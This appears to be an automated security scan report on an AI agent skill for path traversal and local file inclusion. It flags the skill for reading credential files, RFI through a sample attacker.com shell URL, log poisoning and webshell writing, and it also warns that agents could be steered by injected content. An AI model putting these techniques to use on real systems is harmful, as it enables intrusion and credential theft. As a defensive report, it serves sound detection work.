path-traversal-lfi

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 1.00). The playbook explicitly instructs reading and decoding sensitive files (e.g., /proc/self/environ, .env, .aws/credentials, SSH keys, PHP session files) and demonstrates including/printing their contents or using session IDs in requests, which would require the LLM/agent to handle and potentially emit secret values verbatim.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is an explicit offensive playbook describing step-by-step path traversal/LFI exploitation, log/session poisoning, PHP wrapper abuse, and RCE escalation paths aimed at reading sensitive files, stealing credentials, and achieving remote code execution — i.e., clear malicious intent and high-risk abuse techniques.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 0.90). The SKILL.md explicitly instructs the agent/operator to fetch and include remote, attacker-controlled URLs (see "REMOTE FILE INCLUSION (RFI) — WHEN ENABLED" e.g. ?page=http://attacker.com/shell.txt) and to decode/interpret returned file contents (see section 5 "Decode the returned base64"), which means the agent would ingest untrusted third‑party content that can directly influence subsequent actions (webshells, commands, etc.).

MEDIUM W013: Attempt to modify system services in skill instructions.

• Attempt to modify system services in skill instructions detected (high risk: 1.00). The playbook explicitly details log poisoning, file-writing wrapper chains, PEAR-based file creation, and techniques to achieve RCE and write webshells or arbitrary files on a target (e.g., writing to /usr/local/lib/php/pearcmd.php), which instructs modifying system files and changing machine state that could be applied to the agent's host.